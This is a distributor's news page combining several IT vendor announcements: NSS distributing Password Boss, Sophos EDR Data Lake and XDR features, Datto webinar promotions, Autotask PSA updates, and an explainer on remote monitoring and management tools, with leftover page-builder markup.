NSS, an international value-added distributor of leading cutting-edge IT solutions, announced its partnership with Password Boss.

Password Boss is an award winning, complete end-to-end, multi-tenant password management solution for MSPs that securely stores their business’s and their clients’ passwords. The features of this amazing password management solution include multi-layered security, role-based access, secure password sharing, remote control tool integration, multi-devices access with mobile synchronization, centralized management portal and dashboard, built-in Dark Web scanning and monitoring and much more. This strategic distribution agreement brings Password Boss technology to MSPs in Southeast Europe by NSS.

Founded in 2014, Password Boss was designed and developed to meet the needs and ways that MSPs work and support their customers and it is built to complement all the tools and applications that MSPs use most.

“We are thrilled to add Password Boss to our product portfolio and distribute this amazing password management solution to our partners MSPs” said George F. Kapaniris, Executive Director, NSS. “We look forward to helping MSPs securely store their businesses’ and clients’ passwords. After all, Password Boss is a password management solution that was built by an MSP for MSPs”.

NSS will distribute Password Boss in the markets of Greece, Cyprus, Malta, and Bulgaria. NSS continues to expand its product portfolio to meet the increasing IT requirements and security needs of businesses and MSPs during this age of digital transformation.                

To find out more please visit: https://www.nss.gr/en/products/security/password-boss/

About NSS

NSS is an international Value Added Distributor of Affordable Cutting Edge IT solutions, covering technology areas that include information security, network optimization, communications, and infrastructure systems. NSS has strategic partnerships with superior vendors offering products & services with leading technologies that place the company ahead of the competition in today’s crowded market. NSS products can be acquired through a selected channel of resellers in Greece, Cyprus, Malta, the Balkan and Adriatic Countries.

We are pleased to announce that on May 19, 2021 we have released some exciting updates for all customers using Sophos EDR (Endpoint Detection and Response) with Intercept X Advanced with EDR and Intercept X Advanced for Server with EDR.

What’s new?

Introducing the Sophos Data Lake

The Sophos Data Lake stores critical information from your EDR-enabled endpoints and servers, which means you get access to that data even if those devices are currently offline.

In addition to being able to get key data from devices even when they are not online (for example if knocked offline during an attack, or a misplaced laptop) the Sophos Data Lake also enables event correlation on a much broader scale. For instance, being able to quickly identify that a suspicious account is logged in across multiple devices.

Then when you have identified an area of interest you can query the device with Live Discover and get incredibly rich, live data and remotely access the device via Live Response to take appropriate action. It’s the best of both worlds.

You get 7 days of retention in the data lake as standard (30 days with Sophos XDR) which is in addition to the existing up to 90 days of data stored directly on devices.

Please note that you need to enable the Sophos Data Lake. In your Sophos Central console select ‘Global Settings’ then under Endpoint or Server Protection (or both) select the ‘Data Lake uploads’ setting and turn on the ‘Upload to the Data Lake’ toggle. From the same window you can also select which devices send data to the Sophos Data Lake.

Τhe Sophos Data Lake is available now for Windows and Linux devices. Mac support will come later this year.

Scheduled queries

One of the top requested features, this release introduces scheduled queries so you can have critical information ready and waiting for you. Queries can be scheduled to run overnight so key data is ready for assessment the next day.

To set up a scheduled query you first need to choose a query by going to the ‘Threat Analysis Center’ and then ‘Live Discover’. When you have selected the query you want to run you will see a new option to schedule the query instead of running it immediately.

When the query has been successfully scheduled it will appear in your ‘Scheduled Queries’ list.

Enhanced usability

Work even faster with enhancements to workflows and pivoting. You’ll get to key information faster and be able to take actions and respond even more quickly.

Sophos XDR

We have also released Sophos XDR (Extended Detection and Response). Sophos XDR goes beyond endpoints and servers, pulling in rich Sophos Firewall and Sophos Email data with more XDR-enabled products coming soon.

Here are just a few Sophos XDR use cases:

To learn more about Sophos XDR please see this article.

Source: Sophos

[vc_row][vc_column width=”1/6″][/vc_column][vc_column column_width_percent=”100″ align_horizontal=”align_center” gutter_size=”3″ overlay_alpha=”50″ shift_x=”0″ shift_y=”0″ shift_y_down=”0″ z_index=”0″ medium_width=”0″ mobile_width=”0″ width=”2/3″][vc_custom_heading heading_semantic=”h1″ text_size=”h1″ text_height=”fontheight-578034″ text_color=”color-210407″]

Watch the complete online event BEYOND PRODUCTIVITY

[/vc_custom_heading][/vc_column][vc_column width=”1/6″][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_column_text]

A 90 minutes crash webinar where you will be presented with the Next Generation RMM, how to Unify People, Processes and Data in a Single Pane of Glass, and how to Protect Data and Keep your Business Running along with a complete end-to-end, multi-tenant password management solution for MSPs

[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_single_image media=”100922″ media_width_percent=”100″ alignment=”center” css_animation=”zoom-in” media_link=”url:http%3A%2F%2Fbit.ly%2FNSS-BEYOND-PRODUCTIVITY||target:%20_blank|”][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_separator sep_color=”color-150912″][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_custom_heading text_color=”color-122459″]

One Datto: Drive Revenue With Integrated Solutions

[/vc_custom_heading][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_column_text]

One Datto illustrates how integrated solutions increase efficiency and build MRR. In this video, we show how a fully integrated platform of best-in-class Continuity, SaaS protection, networking, RMM, and PSA solutions combine to streamline a response to a ransomware attack. The integrated platform reduces the number of steps to complete tasks, enabling you to quickly and efficiently return clients to production, grow your MRR with value added managed services, improve the efficiency of your service delivery, and protect your clients from data loss.

[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_single_image media=”100927″ media_width_percent=”100″ alignment=”center” css_animation=”zoom-in”][/vc_column][/vc_row][vc_row][vc_column width=”1/2″][vc_single_image media=”99810″ media_width_percent=”60″ alignment=”center”][vc_column_text]

Protect Data and Keep Business Running. Datto Unified Continuity covers all of your business continuity & disaster recovery needs. Protect servers, files, PCs, and SaaS applications. Datto works with MSPs to customize a solution tailored to you and your clients.

Datto enables you to be prosperous and secure with products designed specifically for MSPs. Datto is more than just a technology provider. Datto empowers you to implement and sell solutions that help you grow.[/vc_column_text][/vc_column][vc_column width=”1/2″][vc_single_image media=”100760″ media_width_percent=”60″ alignment=”center”][vc_column_text]

A complete end-to-end password management solution designed and developed by an MSP specifically for the needs and the ways that today’s MSPs work and support their customers.

The Password Boss password management solution brings industry leading password protection to MSPs for the first time. A perfect fit in your MSP service profile.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_single_image media=”100828″ media_width_percent=”75″ alignment=”center” media_link=”|||”][/vc_column][/vc_row]

[vc_row][vc_column width=”1/6″][/vc_column][vc_column column_width_percent=”100″ align_horizontal=”align_center” gutter_size=”3″ overlay_alpha=”50″ shift_x=”0″ shift_y=”0″ shift_y_down=”0″ z_index=”0″ medium_width=”0″ mobile_width=”0″ width=”2/3″][vc_custom_heading heading_semantic=”h1″ text_size=”h1″ text_height=”fontheight-578034″ text_color=”color-210407″]

Watch the complete online event BEYOND PRODUCTIVITY

[/vc_custom_heading][/vc_column][vc_column width=”1/6″][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_column_text]

A 90 minutes crash webinar where you will be presented with the Next Generation RMM, how to Unify People, Processes and Data in a Single Pane of Glass, and how to Protect Data and Keep your Business Running along with a complete end-to-end, multi-tenant password management solution for MSPs

[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_single_image media=”100922″ media_width_percent=”100″ alignment=”center” css_animation=”zoom-in” media_link=”url:http%3A%2F%2Fbit.ly%2FNSS-BEYOND-PRODUCTIVITY||target:%20_blank|”][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_single_image media=”100828″ media_width_percent=”75″ alignment=”center” media_link=”url:http%3A%2F%2Fbit.ly%2FNSS-BEYOND-PRODUCTIVITY||target:%20_blank|”][/vc_column][/vc_row][vc_row][vc_column width=”1/2″][vc_single_image media=”99810″ media_width_percent=”60″ alignment=”center”][vc_column_text]

Protect Data and Keep Business Running. Datto Unified Continuity covers all of your business continuity & disaster recovery needs. Protect servers, files, PCs, and SaaS applications. Datto works with MSPs to customize a solution tailored to you and your clients.

Datto enables you to be prosperous and secure with products designed specifically for MSPs. Datto is more than just a technology provider. Datto empowers you to implement and sell solutions that help you grow.[/vc_column_text][/vc_column][vc_column width=”1/2″][vc_single_image media=”100760″ media_width_percent=”60″ alignment=”center”][vc_column_text]

A complete end-to-end password management solution designed and developed by an MSP specifically for the needs and the ways that today’s MSPs work and support their customers.

The Password Boss password management solution brings industry leading password protection to MSPs for the first time. A perfect fit in your MSP service profile.[/vc_column_text][/vc_column][/vc_row]

Autotask PSA is designed to drive efficiency, accountability, and the intelligence of managed service providers (MSPs) by unifying people, processes, and data to provide a singular view across their IT managed services business. The latest enhancements to Autotask PSA improve usability and add Document Manager and Knowledgebase features that increase technician accountability.

Additionally, MSPs who have integrated their Autotask PSA with Datto RMM now have the ability to click into their Datto RMM system directly into remote takeover of managed devices that need additional support.

Document Manager and Knowledgebase Enhancements

The past two releases added Document Manager capabilities within Autotask PSA to improve efficiency by providing quick and easy access to standardized documentation so technicians spend less time searching for answers. SSL Certificate and Domain Tracking capabilities were enabled to provide a single location for MSPs to manage and track expiring assets to help ensure they never miss a renewal.

Additionally, the latest Autotask release increases accountability of Document Manager and Knowledgebase users with revision, rollback, and approval features. Quickly identify when updates were made, and quickly select and restore to the desired version. Those with proper credentials can approve documents and Knowledgebase articles prior to publishing.

Account Management Module Modernized

Autotask PSA’s Account Management module, which provides a real-time view of the health of each account and allows sales teams to manage their sales pipeline by creating and tracking opportunities, has been revamped to reflect our new user experience. The intuitive Company pages now feature a configurable and tab-based UI to help improve account manager and sales rep efficiency and will provide a more cohesive experience with the other Autotask PSA modules.

Project Task, Time, and Note Entry Usability Enhancements

In addition to the Account Management pages getting a major facelift, Project Task, Time, and Note Entry have been updated significantly to improve user experience and efficiency. The integrated Time Entry enables users to quickly and accurately enter or edit time with an intuitive timeline view. The new rich text editor for Note Entry improves context, and enhances understanding of problems by providing a convenient way to stylize text with bold, italicize, underline choices, bulletize and number lists, and embed images.

Autotask LiveMobile App Improvements

The Autotask LiveMobile App, which enables remote workers to access the Autotask PSA system even when they are away from their desks, has been enhanced, as well. Beyond just updating the look and feel, the latest updates to the native iOS and Android apps bring the full PSA ticket experience onto a mobile device for improved tech efficiency.

Looking for a PSA platform that helps grow your business by unifying Document Management, Service Desk, CRM, Procurement, Billing, and Reporting behind a single pane of glass? Learn more about Autotask PSA today.

Source: Datto

RMM stands for “remote monitoring and management.” Remote monitoring and management tools are a foundational technology for managed service providers (MSPs). Managing client endpoints and devices is a key tenant in a managed services business, and these tools give MSPs the ability to do so remotely.

What are the benefits of RMM tools?

RMM solutions are used by IT professionals to remotely monitor system status and manage processes without the requirement to physically be on site. With the right RMM tool, MSPs can do more with less–simplifying operations for the MSP while providing efficient service for the client.

Drive Efficiency and Automation into Service Delivery

By centralizing the management of client endpoints, MSPs can reduce costs and increase service delivery efficiency. From installing software to patch management remote monitoring and management software is designed to drive efficiency, scalability, usability, and affordability.

Scale the Business

For maximum uptime, consider a 100% cloud platform with no hardware to maintain. With a cloud-based RMM solution, MSPs can scale their endpoints with ease, whereas an on-premises solution may require upgrades and manual maintenance to grow with your business.

Build Value and Trust with Clients

With a robust remote monitoring and management solution, MSPs can remotely and proactively monitor and support clients with one-click access to endpoints, mitigating risk and anticipating issues before they occur. MSPs can also use their RMM tool to provide clients with valuable insights and reporting.

Unify With Your Operations Engine

MSPs live and breathe in a professional services automation (PSA) tool to deliver service to clients, manage tickets, and organize business operations. To run an efficient and effective managed services business, PSA and RMM tools are essential. So, it only makes sense that integrating them will save MSPs time from not having to switch from platform to platform to complete a task.

Datto RMM: Built for MSPs

Datto RMM is the platform of choice for thousands of MSPs around the world looking to reduce the operational overhead of delivering managed services.

• Comprehensive auditing: Get complete visibility of every device and pinpoint areas for action.
• Real-time monitoring: Implement system-wide monitoring with intelligent alerting, auto-response, and auto-resolution.
• Flexible reporting: Prove your value and help your customers make decisions with a wide array of reports.
• Built-in patch management: Automatically maintain every device with flexible, native OS and application patch update policies.
• Remote control and takeover: Provide instant support with one-click access to any of your managed devices.

What Makes Datto RMM Different

• Rapid pace of innovation: The Datto RMM product team pushes updates to once a month to improve user experience.
• Onboarding and ongoing optimization: Our implementation team is full of pros that specialize in helping MSPs adopt Datto RMM by providing ongoing support that’s unique to their business needs and use cases.
• One price, simple, and affordable: An affordable flat fee per device gives MSPs full visibility, management, and monitoring of every device under contract.
• Performance and security: Datto is 100% cloud-based and built to scale.
• Datto RMM integrations and open ecosystem: Native integrations with Autotask PSA, Datto Networking, and Unified Continuity solutions drive operational efficiency and greater profits for our MSP partners. We’re also committed to an open ecosystem for other MSP tools and technologies.

How to choose the right solution for your MSP business?

Take a look at our eBook, RMM Made MSPeasy, where we’re diving into what you should consider when selecting a solution. Plus, you’ll find advice from industry-leading MSPs on using RMM to increase operational efficiency and drive revenue.

Whether you are just getting started with managed services or are currently evaluating new software, this eBook is for you.

Source: Datto

[vc_row][vc_column][vc_column_text]

[/vc_column_text][vc_button button_color=”color-210407″ size=”btn-lg” radius=”btn-round” border_width=”0″ link=”url:https%3A%2F%2Fwww.beyondtrust.com%2Fblog%2Fentry%2Fdispatches-from-anywhere-securing-the-next-wave-of-work%3Futm_source%3DNSS-NewsBlog%26utm_id%3DNSS-Greece||target:%20_blank|”]Read more here…[/vc_button][/vc_column][/vc_row]

When we set out to build our extended detection and response (XDR) solution, we focused on a key mantra: if you want the best XDR, you need the best data.

Sophos XDR is driven by data. It delivers the most comprehensive and precise data across multiple dimensions for the most accurate threat detection, investigation, and response. This is achieved thanks to the scope of data, range of sources, and data quality.

Scope of data

Sophos XDR blends 90 days of rich, on-device endpoint and server data with 30 days of cross-product telemetry in our data lake. This provides the broadest and most in-depth, contextualized insights for both live and offline devices.

Why do you need both on-device data and data stored in a data lake? The two types of data complement each other, which is key to stopping stealthy, high-stakes attacks.

On-device data provides a live view of what’s happening right now on your endpoints and servers, plus an incredibly detailed historical record of activities for the last 90 days – far more detailed than a data lake would typically retain.

All key information and events are logged. This includes process information down to the thread level (starting, stopping, parent, child), changes to the registry, programs running, system events, and much, much more.

The data lake provides its own set of advantages, such as the ability to detect incidents by correlating information across your estate.

Crucially, it also allows users to query both online and offline devices – even those which may have been taken offline during an attack. However, data stored in a cloud repository is always historical and does not provide a real-time view.

The two data types work together. The data lake provides the 10,000-foot view and helps correlate events across your estate from both live and offline devices. From there, you can pivot to live running systems and access the industry’s richest on-device data set to see exactly what’s happening right now, or what happened in the last 90 days.

Blending on-device data with the information stored in the data lake ensures you get the broadest scope of data so you don’t miss a thing.

Data sources

Sophos XDR is the first and only XDR solution that synchronizes native endpoint, server, firewall, and email security – with mobile and cloud integrations coming soon.

This broad set of data sources goes well beyond endpoint and server visibility alone. Instead, you get the full picture when detecting and investigating incidents.

For example, you could use firewall data to identify suspicious traffic coming from an unmanaged endpoint or investigate a suspected phishing attack to see if there has been further traffic to a malicious domain.

All the data sources are integrated out of the box when you have Sophos XDR-enabled components. There’s no need to create your own custom infrastructure.

Quality of data

When conducting threat detection and response, having a lot of data is only part of the equation.

Because huge volumes of data can be overwhelming, you instead need high-quality data.

Sophos XDR has more high-quality data, which means we deliver stronger signals and less noise for better detection. This is because Sophos XDR is built on top of Intercept X, the world’s best endpoint protection.

Intercept X filters out a lot of the noise that ends up causing alert fatigue for analysts, allowing them to help focus on what’s truly important.

To further improve data quality, Sophos XDR provides additional context to put the data into perspective. This includes additional intelligence from SophosLabs and the Sophos AI team.

Source: Sophos